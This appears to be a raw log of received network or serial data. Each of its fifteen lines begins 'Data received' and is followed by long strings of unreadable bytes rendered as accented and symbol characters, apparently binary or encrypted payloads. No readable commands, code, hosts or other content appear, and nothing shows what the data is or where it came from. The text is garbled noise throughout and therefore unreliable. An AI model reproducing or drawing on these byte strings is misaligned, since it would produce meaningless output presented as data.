Data received	·¿³±]û}³äu=A¨ò·k¨¹óÄO)Ð^Ì³Ö°"ôKø¸Óøëf7Êe¸öîx©VÂ£Ò}ÏìçÀ>¾ú·_§IMzÀß2ò1ÄØÇ íd¶bJáìµf¦ªL9Ê_o±#zYÜe _5u î¹X!ÎLiê'jW¶Áªú!'¯GA¾ÈøGºZ²´q DÓ_HÄBÍª{ª#c3?ã+Qþý`Ê>àÄ)}ÁJ÷zÈtþïÇÿ.©'slêÞ\±·Ò¢n,Q-ø&òmÈ1qbÏjr}ùÁhõpÂëÅpY´'ORÚ"ýáY¼½ï©IYaE~ÓøLxµùkgbåÁTßnçêoÎî?ÈÉöRrË«]S¾f%üióX¾Á+ó7ÌáH.Ë'o°[z)ºNÙy mC\|Vk)& ÆÿÖøõûkµu²âècºa,ÖÒ%_K#úøð~¡VjKPvIFµÔb9ã-q>Ê< ?%#WZ?é·M<TvÌV´;ógÆ«qÓXóNÙ?NÎ'i/¿²'ûòîÈÿÐÿQåñxÆ®¯?tÅLEVFK§[ÎÖÔ¢ `Á¾ý«Rè{3Ä\Öüë&ÇMÂÙ^øt&ÔÜ sÆÍ3ÊFÇ"6AºVÙºZæê¼9Ìç½¤råQb}\|möÜ©J-[g>àû{!ÿÂãä¾¡Æþv¾m§PBäfOiÇkàÛ=ÑçÏ8ÈGûGM±4Ó¼ßRå¥ª8?/ÕG³Hñjn÷Óï\|+bxÃwä.¡o²ý¼l8MÛB88ÜC;]JL)¾¹OÑö¥Y"ªôÌ<b:PÅ¥LØ@DÈ-©/(²[Õi\|[&Ãõê^¦b&CR;ö#Ã þ4£ëkèµ<(ÔcnjèÜ¡í¾P!')]Nz×õ1¾½gäWX¦Ø{0ÉÌ2ký¡l99¡0ò¾=/>§²GÕULÛ%£\|Ø°é°¹°:Ê$¿ñn{Û¼ªú©#\¨3,Ëæ{ü¶u»^ÿ_^'·=Sys÷¶Hò2ëÛÛ·ÂO¼ub0¡R`\|ð¬nÈ}{Mw´)AM:'Ë««¢àOê:×£QÂOç÷¨5ÇñKÏ\|Ïó"ï_çMf #õÙ,S@®rÈ¬Ðïú:7ð\|óììÃäÌ+J±#j¤ÇÈó¬7¬j&(sòÇÓ{ôúÇjÝy¹oFéSúP#'CoÛÐÀ6ÈRY]ñ%Ü¦\åìqö,Nàfb)UÍËÔD0W2lQ<F¼Ø®n¬&p8\|µ}¨_(¨vÓblaEÉ4Ïr¶wõ§È!éo9àLÛ°ò°úkó4HbEÍ·ÏÒ¤cÿñX4ú²EN7JÙ¤û`µ÷:¹2â[0«âó .'~³¬O÷b_¯#53$b\|@oÙ>-¢áëxÇGùäÆÉ¾mpS»3Àê/¤`{Z÷Ù`EHXÊÑ¢*üD,`
Data received	"GuùZ¹òç×þNHúñ&wÜÂ¹;xùïÙ9÷¶ÕãÒB@ÃËÄ ;JÇ/§u40É×rÐÔQÉ$ ×'!¸$X;yºxI!a)üÅì¾.Æ£«YÖV9ªHVºÌc<JÍÕ_lkØq×©XoúïÜàò)^5yð¯ª=ÂµJÏ<ÐgaÍøG£úÃ´Ê Ín²}ýçXÜaßq\|{ït= IÊ÷ÎsÕãæ3T-Åü>EQÍßÂë:yF3¯l;¯]çÓb;B xHTq@Íf6M Å+$y»LÖ}«jjß +0:ISAd5ìäý avâjU×·^Ës²×ð@vJPs}ÂÌ@C¹s}Hû»äxrÅ«íOÐx\|òe³p øÛõùLµ!:¤³2¥Àá©äúù£Tku3{yx'²îNz§Í¡õÒâº^âl=×÷_ì#çbõk{ Ê¿¸.)KF³OÀäÐm©¡ëFån#¨Xå`ø·L m·salÙb6ÛYw£ÆÖ9ÃØKJc{k3Ú§ØX@ár0bG W²k=<_LXx1zB%ñj¾3´£O`\¡°!F#p ²{6\|sÞ!f0©å¶Å«UK«WT-û¶ÎøìI0Ë$7jã!¡ló>HÜùÄ(¸Í µ+ð¨ä dà¹\|. büQÛÑKê¾W2]Óc¥$²>tá?ùæè¾,l£G&È©³è>ÐÄeCbäÃçwÞÖp¾èHÚ§k\|À Í=2 K¶#Ðùb¢ÄÏþ:d/ákv g+§ÏÞÖdÏÚoü=:- ÉÉC&i=Õë,½GëÊÔ¿¸Ý;\½0Ãöh¶XmX·P/S:¹»ÎßWíé.£\ã«14J ²>[IÝÆË =CmÅÍã\ÄùËí÷@/Ë®i#ìð¯É·:Sp¬+YÝËøû'ß"¯`Lqër¦'Ï{É2D$½¬åÑ]:Ú!y1{¤ÿ³§º«=ûÃ¢<suc>¬ WÃz80Eé¡7Ehp% Æç)WÒ`sN×[@jòzÍ" ãÐÌb1å6k7² ÞÉUFðÑhè,èÏè1RmSâ£LUØ0JE½f×C{ôôùÃÆÕ£ç®5_(DÜí°«±\<ñx¥þË»K)0p#uÿßªl´?µ]æÕ$iCX-YÇ«ô¬é\àRð+g-;y(pv$[ª}I¦½{ Bçó/G5@Ð£%¹È»øóæÄÃ!É¥Ý~\|F=þßíÁ3Âõ 4d¯6©µ©ª¸¥y÷ËÉÞHVõ1ÊÙ9Ù«x~'21_ÛÁ¨ÐðËrVöÙIâüäCnW´ÄêÄÌXÍ¥]2ú$q¤d/E'Å«½V[ñ!¨ôT¥ãÇøZqº@¶ïdÁ²¿%g×EÃ^âÑAõQÕ-Ûné³§óEõWFcaÐ@UnøÌ&·c´2D1x\4PbY(N8Z£nÀ#Ë»èØüÄzìÏI.YVVu,ÐEu£?IÀyz.rÚñh8ë.vÞÞ0¨¶Æµî¿ÐÓ"*
Data received	hÈÔ_Ã 2&;¿YR3Ü»ª¾fuñ:µf+oæTÝwæÞ)f!?ñ´ì'ìö]äÆºyse<8äGÐ¾%I¬Vµð£Äc\çóazþtcÚ, WÈzWÝs/&vÂÅ<Xà°<âHP%Y@~D;råA¾©%Û´óW°zõý(ºÆéDlsë®3ÇRý±UÃÚ?©/Ai8®c¬ðÒ§³ÆóÇð×d±»ø +¿÷üÅU?C²®}\hÉ"Æ¤JÂº5ãÍÖñ®ØGëÄÂE72ûÏ"¢9Jâü©FÄÞã/?ö?GóÕd-£$4ÐÄª_v¡©ßO»FqÈío_À]Éô;j·aÔb®ü¢Äßø!¥EÌhu³uÊç %µëø UoË6D%V ô°wû»ÕûîWBrMOÚ~÷ï!¹ÝLwO&·rïTÑ/òPYçÆrmuyPÿÿ¸tØ Iý^nÎ%QË«ÃZ p5Øzú¯VÄ¹Cy8ó[ Ã`/Sª/x¬ ç{ÎörZWBjÇÔIùs±/«¦T$¡¡YéÌÄhoªWÄáTÚãeî'I$I4ÕZÏÂ-aWpm</v}#Uå?To®p#äv4~)÷göe$ôËSCÑdÅ2}uöVåd 5ÏkCªú½Dvë+5SäxÑ&68/½/Ò¾«¾ì9^ªUg¯YæáD#eõS^4çS)0AdýìRD;?IÚLOIåx»>þDÂÐQ®ê`OwâòfòÝ!±Ô#û0öáqà £/Òîß\|éxÇ®ñÉµF7»µÚ""ßÖÖx0£1oq¼u.¡qºïæÌ#×Cøî@E«°U¯ËK^³pÆÉJnyüDõ¹PWÆÿ×¹J¯CIÄÏõ¨/Ú@ÃÓé òR¶_ÇhÍ}9\¬²"]7\´½ÌóçÎp¡ÙÔ7íéÈ¾)9a"÷±çç¬3í,ýk: _{CÃÖÉÕ¶ô4p[pUº!@ëÙ pñWë$;ôÇÄùSÓR:k<6É¸ 68·ÔCZ[`Fä'ðãl/`Ih×'QPy@©¯ä£ ' z"T7îV³_CCXùym¤Ø<gý/£Ûµo¾Ñ\|~Dó²x8JÓj>Eý¸Aa"-3Ö@ {»®èx¿þW_æ¾új?[¯!P¸ÿç1V0å3ä£ß%XÕ$b\{±m±½ÊpÔtlkJ¢\|õXÉ7ÍaÅËøRlbâ8kÃ?Üµ2f2~R¸qóèPxôr²I íCßåZ¡9rqe¹Ï0d²U²`tX¨r¤Dî^;Õ%Se7tÞ´ok¸6ßë9cù ùâhV¾0Ý°lè«±»%!»ú¸ZØÖ 2`'MþMnh$~S¼$<°%IÈD°×psP¦qxÏQFIo#ã vÑý± ¿Ë6zDµò3g Ó³åÀè@nR´¨+gðxô«ÄEG#:VÃdÇ¯ûØZÂ¨ê\iï43Aí;º[þ4¾sYéÏFÿæÈÕ}ö
Data received	]»ÃínXør ¢To½ D4Ös}Ìe^ÏkOÛÀ^%(>×aR°\àÍ¥»ê"AÃdÿ7._ËüEÿ¤xÇS¸Ïÿ9íô$Enx¨Úç51GðMÀöÏ<WÒûÈõJÃ4 äé~Î
Data received	"7Îivqêqñrr'ô CPçän¸¸mëÉpÃä;EÖÑ_¤Nöæìÿ$þjB~qÏ\|¸¶B½»\ýÒÒ]÷çDµ=£Òïn"Q¹³ÃÌ?²æZøOæ9Ê=7ÿ¯2Êíò/ïw¶pî7sÀ 35¼àúºÆÆeª´·ÂÎaÅÈû¼-^ûÇÁB^&ÿÝ0º À^+U\|àÕ,í#ÄÄº·¹ÝÉöq'Laép=E¹(õ¼ÝµSù%:'Î«þ°Ù?ðª/7UnéG\ÅyVÌ¦8ü~½Ù]óæD%÷¬±Qi-Zf^Ó´g}"Â¹DBz[7#/Ä"á¨:näå£öó; Ys?%>åhãÞ~B0QÊþ õ £)P!ÃÀ¹Ô%Zöã4,úÍµ¸'ôÙ¡JV<9>`^ì½àgDüR'êMs¯Ìî>ÏXí¹O¿)÷6½¦¦W<ô~ÛÕãºGÖ¡Q{µC¨'ýÕwzµ´^=JÞ}¥oáp7,´²²;#«àñÂV,9É«ÈºwÃkÀÅúx&fÔX8Ùxß¿ÍmHÄ£3ñDåÌOn®pÅô5®ÙÄL]j¨^}¬}q/ÝÃÍÝF´Y×Ùõ´Û¨Q+V)UV@ícÔG}~ÂcS/4cN¬Zî34½iþNCË®°fñ'î0ýÃm·,½k#Jî¶@gå·»JÕ]¤ úØ\=ØÄ2+~ÞicÀX@)£¤"$2G7Ö){Aç?»³jo¯Ù ·R¯ÀÃýæÞ±º2[aRÏäÔ¨H*Ï4jÑâ}è«!r3j\|/aBqô,Ý&\# ¿£öi´NOµ¾±u¨1º5·gËb_;Àý4{ LL `Ñù¶ÈÿlÁ¹UÕ§bI¼ ap.:´]â´ïÇ¾ñ·ÞRÇÝ %>Ð$Ç±-9ºúQõpEÄIµ<sõÍ ?Æ1µRÌZx°2OºDE¯×5=³Í¥W¦Í@ýµÔ.Ë¾:=¥iQtÐÜ?4É{ï>)b&¦£.UÏê§¹ìc-gEFn¾üwâ Nùð¢ H6<b(1Ï±«g0¡fb;ÞfæK¾Á¢"2aÒ Ñx¤J³ëïËÓÄ_Ymk³ÉæÇv3ÈÇÿº¥c¦¡'íNaÙ)Üú)?qÔÇ°^µìõ®}T½,h¯ñßÕKf~å:É0&f¾\|â§f µÖº´]±íxñµH¶¹ß<OM×Ü?wq>«fj6xOª©LËÞ }b#8ÝÔFÖ«1[MúiZ'¿NÚw¹w=Åµqà¾ÉqÇuCF:~\âBá rUÑðçúÀçß ñuN,ÄíAwøm/¶CUgN¬ô-75ÚÈARX¬à@
Data received	ª$ç·>X¯rj'ò>á-ÂNIÃB#T90í(ÍaKç¯×:¬brW·ùB©+øËÐ}ö²úÒ°F©(ËV7ñk#ãð·-2E:ÆÊpx»ùØ¡¤ºUäÏ&ðñÎ"ªñãQ<'wí®ÑÓi¯ÌÃÿÙ«¢4Ø£äæõ·:51©4ôåª$õÍ\|(¥û[á§®QñlPËSäÃ6if¦d3¶ñ#F,Ã³{H .¿¹NÛndphhè¬Öy:ãªO¢©3ó{fãBjÖ®âNìuu®§}èÃÁ3Ñ\|óDSi0Y«ÜV¢ ß ? ÙÔæÌKR#Ðr}:&àjP£WFÒ\|ýnÂ5¿ÓQr¿ÑJ"+ £ è~§ØÌDh1-dÏMnB n»zo¯×ðÑ·tW×AÑ¬©3>19¾ûw°À(_ûf¹ic`@MájÓ°e!0@·<U ¾d³DÒÍ¾ÚÞ¶/ìèÆuï¹+ç²!\|Çz±¢põB=3Î¡LUÞ%Æiä:ûVü# mjëöA'Ôl.9'¤lÝãªÌ¶¥_7ðµhBN>þ3¯ÒÊ,ÎÒK4àO]QÎ×ïÛ\|¾ÑM+¡Î$åuØS³K=³<1»P)¾Ú8ïK2t¹h0îCEÁ+y1¬;Q@ æÒ¿Ç§.ø¨I£9´Ô¹5§áEúÏJÍÝ¤?ÏnjY.×ÒJSr!´(¦çmÝwùS°9ùÖ_ÉÞÞC;áåKüiÅß[ßÁl1µa¦úºz¡ Ä 4'Àâo÷Üîù%\ÉÄïÒ'ßWl?~¿K_ð.,ä¨&§µè,òszÇÉFBÏÛdµC ëÉÿ!t4w-¼RÎcª5¡ %kiL¨ÜivæÃÊªä[Z9ÓóOÇ©ÈxD¶IöÞ¸:WÞy+bx mKÔT%BLød÷ÌÀFRºØO&Ò<jxFvª«l¤T÷²9øÔé >´G¦+mÿâ¬<¬ÔÃÛ\|í'¾pocK'¼_"ÖNÓ7d2÷ü'ÀÅ¬!ÓvT+Z¶7Ãd0Ss¯³-!åßEã!Üõ XVàTìÞçdTëoÕô¤QW¢Ó¸È±l`øxb8Ñ 7gÃRÑ=Pào¥ÓèR/çû%q}÷EÂ [¼ûåià<Ï×ºõyèöÚ¡¤Fñôh¼I§-ÔlÈ±Àd¡DaRk&"7²ëGIÒ,$HÄÇ¼òaÚæÛï²¡m½@àø[Ûûp$=ÅõÆ\ÓSª=è¦$ M8{69ß>35:ÜnîÉèÚvÉÛæAGà_MLuN:ÅMtÑÑ½ßàXí:Ãá¢%ð¾wv#¦c$ûÞ©jQËûR³btøü)ùXtÌK=Cz\|¡3ú4 ùcæ0H µ.ºg¾#ÕlÄòëèlàØí¦#¥\DéKr\ÿsqn©{Ð©@ÇÔBÏcQ@[úÿhÙó«À vÈ·`ÜÆþ]m83¬ÓÅ¬~"î"²ü<`üDóre)<Eu#"q¸Ò@ïó"\|nµ>ÅáÖMÖZXò
Data received	w®÷z8ÄãèåS`p¾]©1É Üu¿NYLcÿ8)ø>sÚÆ/ø Ò¢ó2úÛwÐFJY¤Ùv!-ÅmæÅñêL`xPÒþRmøçl.#Osó.qéÐÏlÿ´3xÑ0l!ÊM'G iÇð07x!ñô÷ÞÈ\|ÕÓN^3Ú;ÉD#Õß9!@yÕÝ;×$]Î$iñò¿°¯ü{Åekdy¢\÷y'!uåCP-Ûco>CwL2ó Ã1tþâcêíQ;0àG%ß»-TjódòñIT
Data received	÷3aNFº¤ Zÿú]9ÍdGÝÖþþµãX±ñ8Ùþ1¨ZVÙ£F!Tx0îjT0#w¤ \SIöÚLÖ`Úu±4&Mj øRh"½úí¼w!õSbÀY§¯òYK°c½ô=×pß¶ó<¹ãÐÿ¶¦ÌD¨W£1b ù2T;åm?ÀÈUíá¸+Ë¥[¨ñ4ßÍ @øh÷áaþî[ë×-¡È 0àA(/[âºïðºIÜÒ´»Juîög;Ajc¦ Ø<ÂGp<Ë»®_G`µ6Yÿ Ïã¨þR±v¹wpÈhDÊð¹'@Ïi`doð_1eP <¶3¯8ï"ÏorI8L1£¥´ÍÁ GyÚBU#·(¼ÝCU´¿PV5@GZéOñÒêp¸Ú®;LÉ3Êßc°µ#F³ðÌ¾=%sç·Xl¾¿£_Pì¨o-f×ôº ÇÌÑEuY¤¹6«ÎªÖ3Õ&9õå¶K$7µOMÀ>;Ea3 ;ìDðxT©be6©û@-=¨+&«½®BGF¬©O¤y«S9¹¶yÃ6hÈC¹ctönÇ³ nS>¤H³N¤iO&jÀIØM85¦9t8?¥Eç¥·®Ãêjÿ(:eF_R½¥u~Æs°»ðèE;+û^i?þ¸2WVý2ôcòÕ×á£Q5wúÙõKÑð1Hàu¬«IûAu'[ó#3r²°q4´nEöÈA¸I3©ÐÆ}ë¥ÅzïuÄ®u5é ¾Q® ÍõªT 3M²y Õl¢ÑgûAÄ të\|[[áNhuO[i6 Á6oùÎ6À<}³=Ûnú²à°ºO«s\|Åè¼Kÿå¥mº\Mî!¢VÏ]K¿è,±ª§q\ÿÏØîöJJÀrã¹ÿK§í¢]_Ì¾Ø±jðÏYU(¼ÖVß®Î¼Î¿¹w×\|/gçn»«aª±éc'^?zYRÂ^ÍdmúÆLUÌ 9q^[:!;®!45ú²ôèkÄÓñ&]#âsøÚ´2'mÓ0«úæÙÖ\|¶/R H«r`h/6«¯À@@°¶ê4erÞpíåäIí6Xxyô~3Hé4ð?v"«-y2oM¦.NÑ¹¢ÑóÐË\ÉT"1µb<xSè`¢[BN¤I]Ìú¯qýáÒ±^niÍ;ãÏÒ (ñLf®ÈÛÛ\|Ð¬Ï²Ò;è_G ªWi[ ¢¦F*àÅE+6ä.ÓÛnï¾R§&öðª³ EóU3À¿Ã§~3´Õ"ð¨pÃv`Æ2ê`Å
Data received	k7¨G§N»_ÝQBñË[¦z·Øÿ>°Ó>íã0î½©ÝfÏzËdÅó¡8Öò'-^Yýçp! }b«B=ÁKÉo>ºáJ2ÂÊ=o¤ÀuÔþ§Â.kyÉ@3ð¡UàuÒGÚ³sûò`Àîk£ó[ÌåÂy7cÎ¡½£W3G 4'î9¶Î2Á&Çv5,c(KO½d3P+;8Åº/Æ>öÉeÆomº·ÚÊN!@ÄM¯ÐzãáÁÚªK%æÐIÇ´óÁÍÕæq¸&3 fÚE½3tbÅÑ°~á4Ù4]£{C º#{¬sÓ7)®¬l®µÚ®=èâªøGXÃm0¿j¼â±Ó©"¤c¨zzåUxFófßôCÏí!° ^Þäó8¿rº½f+ìb¥!0Fá.íV5~ÂÊ×©ÕIãÇgx«Dóðv¸óSßL ÖHK¸éåkê÷C³_!úØÕéó Ô«p_ÕTîsWÊr]"JÛ¤¬M<×ÏëÝxÁèi+\|h\¨>ËlààIôëwãk×±¥¿rÇRÊAA,>uHuu!Ù"¶ÅfXýñÆn÷®cïHÙ©ßñºÅ¢íùBd¶^Ùa-T=F%öÃþDÔb×tÑÏB$ßÚ-Á,îUCrÝÜ¥ª~íÑ!z+Q%KzêµoÈ.YOýO÷è'}ß"ß×,JPYîó©fú\|5È·=w¾Gz'£éÕÌªºÂ<ð>ÝCî![ÎKÇuÈTWAì´¬±¤9X¦¾^ï_%Ñû¥úéÏ ùûbf}ÇÌHÔùS¯¬½§àÍå$,(û&3 ëÛTèÃë[¯?8q¥tµrµRßPB¨Á¸¡_}®ÛÖ6g'!NDH SjÔccÉÒRÿê7!Æ¡ï66qÜìÿÍd¹,êF}ÕWP#Pø¡LoÊß0ÅÔÌÂòs¤ß{ÍR¼XGt6¬ÔwÖÇ)vt@®56 °æ0ó³qµAÛo$è+w·ÜG#æÑYe6_Hÿ?úÊ4!°-¸·õ_rÒÌ!Ã«ù°G²ÏÏ«ß·°5»,móÕÜqÕ¢Àìk ©3Õ¼¶ÝûiÍJîÈüÂz°¿:Â¢d÷ßáÆ\|ÆìF³¹,FÊò)T¡Þ@®Á+¡fÇtOa·Oú$=Ó!Ò}CÑuGÚ\|sçH,â\|vÙ®« Ó^® ~mÜ>Ï<Yj}¿àÑMÞ.ôðéªytwnr k\|Õï¦BRïD»`ñl!î¨åúºzouÛ;ú£ö%LÈ4Íf!§M ÖÈÃeRZï9£)Q0Ã» aæAÝîÜD÷Xé®¦3²7ÑÆ½ê¥cH··ÈhGÅÓü½pfZ¶ä?ýmQ _&¦ü3ddÂ#8éZ¥>TAuÁU+îÛ hý¨gÍ"ýFÏÿ Ðßú^z{Îçæý?¿ú<RÌLÈRe3Caç½ÖþF&\âHI?(°@ÍÀ¶»Ãö¼B¶°NSÍÃöÚ×Q§8; ]\®DH!½D9.©íÃ ·]í\|¤V
Data received	zA,ªøßÉ>ÙÕ«G"&ôÂþÍøU#ã)H³UfçrÀÇI¾É½Çãý?ÀÕ^3õÿñú¬ð;x,Æ7ÏºÓz°«¾=) -ö@A÷Â±nÁD%P¥Vh¬Nÿöÿöh±æEó½í}ówÌ¦x¸z+ )YÊo4mÅ(ºãx=ÓXiIKvw=$IUäâîñã44ÀYRX¡NÛ®,´í5TÜ1K~-³ÕJ¡XÉ?5:ù¥ÜNÚjà/lz!Xv[P äô°PþÿÉ{z¢±±?Ì¬ÒéñËù(xðÐ*i'>^_0Àºógs¥V8ÅÃ`uJÍò\Rcï»Eq#5&öË4á Èy<ÓÎTF«ôÕÅIB=CåZIý ]²Ò¿oGpðÏ»²
Data received	¡´Õ´v¿5ø\Ï\`!n=ÕÑµ2xÑ%+ä¼mùñ=ÿº%¾Ú³æ×_%e(_häª¿@¬Pð¯Ú¾!ýSájûiþ ¯ù#!yÂÙÐßyç\|Û/d½\|µ@»p«z¤4àëë³Npmd´íâhV´èí"dß"&í¾ {hÎÆ çµµáØlQZê ×¬ÇéËâÓé(Tÿá2èÎÆ?ôyHà¿z¯Á[!Ç´»ÇËÂºÉÃ]óUUxÉµG"HTh#§{ÀÑ{PÄ³-aÏ¦úÙfYÖc¯Óeþ¢£Å'wÛzäö¬B+%B?Û³VëùÖ±~ÁnmÔNWçiøI!q]FÒùåÚ×{ý>£Ó$IJ+ÕJõ1ê@D-_U°ÞÆü×p£»êÑû¼rW±D¡»¬û ÒJiö«ëKû rF· ¢/Î¼¼lf(àÿ¤ºPþÞÓÍTç!,r¡=w;·$O¦<y¡åú[%Â{q9Ö>Í¯5æ{÷»Ï¯å²©øµL>×%LLZ©ÇÏÁþÔÑ@MNþ¹HàØádËrì¹<JÜù¹Í^Ø,'>ab\| ¨?C7Ö¡a/²ÔîZÇ+m@°/ÑcäÎ~¨sØæ1@Ð¯ÈëÍ1Øß¼4<ÏÃÀÖ&®ÊËµëo@QséµYÐàìÏYDC-k(¸êð¾°)B}G£´ÎñÌ¢'¡Î=îc` ¥çòîlSV,X¦âq¼AøÊûcÜF¿¼÷# Ã@Òê3(bf±I«Øð!±?òÎÆðqv9t[£Ó·©$5)¤ª>º 0 ±¥.¾ùôíIçííCO»{w~C·ßmF{Ú+r{SØçÿðê×Üù !ZF?_ú´´j¬G¦©Ôi5»Å6ÓJXké1ßGÃvF÷DxØõ [¾/P<-y:!FÛùDvhµÇX¶ÈË©ñ%/O³êfïù²½ÅoRÑ*3 Ì¼ÜSáGY¾ù»×ÿÅþ?mI¢ç21×!nJe]KÐçár°p ¢:ÖQìL¤¡vUë½ã÷/ç0h{¯ØP ´x2yÄºÖk6IO¡ÆxKÖÂìOXÒé gz0>ÃlN<àÚ7¼®@[Pãæ9,ðËl0×Wy ôZµÈ
Data received	4<s§Cy¨<§¿,£VìqJO¹Ûçâ4)RþdÞÈ¹x.Ê ð»=)PyÏØ±è 7m¯ÃfwlF9õ3Ï¨3a§ïEõ·³öÔCk%ï¶áuY(×3ÔU½+G¢Í0èxÉºJ~ôuD>ÂyYÊkCû\|úVQaTôÍ_?æ}(xl$â2Óèúr.æíæA'=ÚNÛf0n¾R±pPõø¢7ÃâO"÷nVùræwÌâ£°SQ¾7¨:¥bÌÔ÷C¤®\|pùX8 X Ôäl)öêHyÿodVw÷q´ÎÅê¢W"Qçv[?]Iq{Ã£ãõyV;ÞWì!ºWk·~RÊq9ýðI¹x@ g¡òÀ¦R2¹<åöà Eë¢)þ>¼«qð¯=q#Lÿ"S`x<´?ç^ñ[<A;ÍP14õR #»CÌ;fÉ¯v,R¯¡Þ3¢}XÓxç¤9g_(ëOvìVÇC=Ô)\(üïuf~ÄÒáK½WÖUððgÖ«c¬7ðÃß·\|Þ°¼î)ïR«"YÆÀ×ä=&4§#À®V¢úñÎx_ô@Á<.Âw1è0r»=#"^ÇqxCP[ç!Ô)Ûì78am=éîxÊ.ÈvFL çPíU2"n¼³Yã¾,EJðî[>Ê¦ã[ä¥¢&Ã¨ó¥ëL¤Ä)C?£ExÕ@ZÈrþ£ tËúÍ?/íÅ°ÑYÙã¨Ëëf³(rþíhdTèkx&×?Cov½Å[â7º#U&®}¾Taöß_T+Ú×B0¢º1f¿ÆøHb`Åå´6]v¦µ8 ìb5cxÕLW»ÎÂ¢>îíÆ5ëºúÁË%2Í_Gî´È(è=ïð~W?b#ÌÜ ªP¬^hGáÓø´ÜEIØe°L´ ¦©I^nÁÛõnD> Þp³\ZaÛ?Hl}ÀBõ%t¦ME¨¸üµH#«×EÄßjK´E0§å\|vmîJS.<Ô×ÇYÕL!ðýe¹"®KyÙùÍ^ïÙ'j¡»= ]o©û05q2Vy7¬vJ{p{Ïeàºà«`h´ýÔá$:×½(¹^U¼/Èh¥{©?w³kgë¯ä ¥\¿Ôé±8ÙèÄ²È9-a=µVS¯uò 6-µ`ìÖ «ØäÐûê"0ºDÂ[ÓüÞ\ýaØ(=hæ¯QÃE;PGÁ§Û÷ÀÌýbÖAú~:>kâáLÂO\|°a»]+WúúKìëéÈ«Ñhä;×BàÌ~ªYÓÉQ^Ãfm÷o/ s}ý:öí6´Bl"?³?Z\|aÃÜÙN·¤BPÃW°:âÃti¤u{«Å:»Lx(±@?9Þ[+/%Ïs ëáJÒ1]_"á#@TÅýåèÿ¬ñ{öÍiJ0Õöî(æÝ@IlÐa¬¢kMÑww¥ðßçÜ_¥ÏÇºèäÍÕöÝÔKÄ=i dòé·ü)ï >ÐçÊ´Ñ¦b¥»g£O¾<GkÌêL+ýÖ¬)RGNÝù`õ}öPsZ;³imÞ1»½ÛÈ8h'2}lH?§Q
Data received	Ibý3×DQ¶7(Cc°+Â´3òÒo¯üí ÌJåõw'ÜDÃ, êùG±ÌÎ l{¦\|øûé¡CwKÇÝ5Ò\ìæéêï4ò» !¬æ¶7ÝeTñU¼å$èbz;ÎçMÄÙU%ÞàdV¬&£F É5E<t¶e=ÛK¹òöÞ#ÐÜp-ÇgáÉ0y\|Çú·PÛÊÃ]Dþ0ÉÎL^tÞÒpC¿bWÈÛ&ÓB iTyª¥?> þñZ¬Ùc®ER²ß©q!QsÇ* 8~Í/í:)pYåè®ç`+(T@5wb%Éy .¡ ÊQCiÇ×qçÎV&1Ñ8%B¥zKÌÕÀ×vêßçÓÚ*ü ©éõ»\®ìâQúTsWéÌ'êÑÌä6úêÚo@lÃ/yÑ³Zf¢Åº øÕëùxo¼·ï\|±Ú¦AS7Ý¨×0JØgõ/Æ óAvxw´ssAó_oôk ·æ¡ÎÐÐF°ËÅÖê»J¥£ #Ã4B^(dÈÅ!êU½²'!¿mK fñÅß¡,m
Data received	2Pðû§XíÎÛ8¦¿Ùà¾è¢RgMYHJØ¯æ(K¸6pþ{=ÈY(wôP\|^zhYÒ9Dem9µFyoBEóî Ô´ÌÄ7£íÎP±÷JÅ4].å'Pð #FS6ú#GªUtÚPÂ/Rc^ù+Cí.MáFeO»¸<dsqGêñ:Ã¬ ¢£vNÏZÄ,êÍDM®cìYÿÈ¢°'küÿò-²_æÔCª9k"áÝ§Æ0Y m`ÓÇonuysTÞDC> 4Ã)Ý§Òge(ìIC`XeWS/@j YÂÚØ.>8R3ÖzºÚÔ/ïëOØ1À"dÙ¼l.@Ní¬öIþIï>My%go±Dbë-gîYBdÞ¥»Û¢·U¹©9FÚ4i ÿ5eÙ+(nöÿôn°¼'D8ÓTxý5SJùR§þ¨xöô Y[÷÷V9cBéIû~k á4#ïRjz@öôÇ ôêÞZïlõý«WX±6ÆRÚ Ë+kâÖ£MË¾)ÉÆb³É«Î.«ý®Ýør¶¤þ³¦ÞpLÒ¼ÕýÛ·ss~²* _[´êH¯ê}Ðùe5]"HyEµåpxº ðëùè sQ½Le· ËB¡d~ÃÍs0ïÐ.\ù0ÿÃMxÒöZõ¼N¸í$Ámísá¢K)¯ eÊkh`øþRAÃãR°A¬àT;¶¢å±Ø÷ MDý£q\|$¬ÂÅýh,ëBÞYÈÎ¤T«w×¿>0î5RëPpû¶cæ ÐÖÓDåGm~ êA.dÃv=¾Jíl@)[yj¦±Ð ºÃd¼y"µ¹hY4SÜ-Ú\$IF)ú ¬7åL¶æ*!ÏÎùI{×@²ð©sWµwÍFæF¼ïýypYâJ\|F"y:ÎÙ²¹ÌJó§@KSQ¦è8^äD/Z.¨Úkâè%$ªw±O©
Data received	Ê@Gµ¼ðz#Z9 6?Îà<5`1ÞKèLF?Ë9 UÕ÷»1Ýãéµnó¹Òù\|Qé¸îº¶ú~½U¢¿¬0vcp/JXÉâc$}Ñ·waEgkå0ØH¤³a½.Iÿ¥bf&7Í\|ßéBOü3i¤rïn}8Ju2ùKîf\ó÷¬WÏ²ÞÒÐö=Á¦ëHi°YdìÃê/îèg)kOÁîëÄâ. \Çb]F.{6Y¯KQ%ðq¿«i/kû2h#]ÀqÉ·7:@{öäXþRÀð¯ññý²ìv;Î²LÚñ[ê¡ÈîÔ.wÿ¡þEgè¾®O[%KûòM\üu±¿ ìÅ¢Iä ,\|ôû£©®³»ïgðÁñáE,êt!~Þû»5ý :ñÛR$°ìñòëÚAÕÇ©/OVZÛMt¹cá¸ù´ªñÌ9Yoøvik,kîzØ.¦ÉçÜ%Hã.'0¡#jÍ £ÁWº#óõOHÊ©±º¬¤p¼dµÓNqR°g¢ãÃÍù=óù°0_î&ð¬¦© ]MÀ-aÀ¼ö¦½x°¦RFc yH:þÅ÷"K='·ÊÌêÓP°Ïgù6½;³øÁÌÑéËÎ2{¸Á\|Üûé£ÁN%Ò
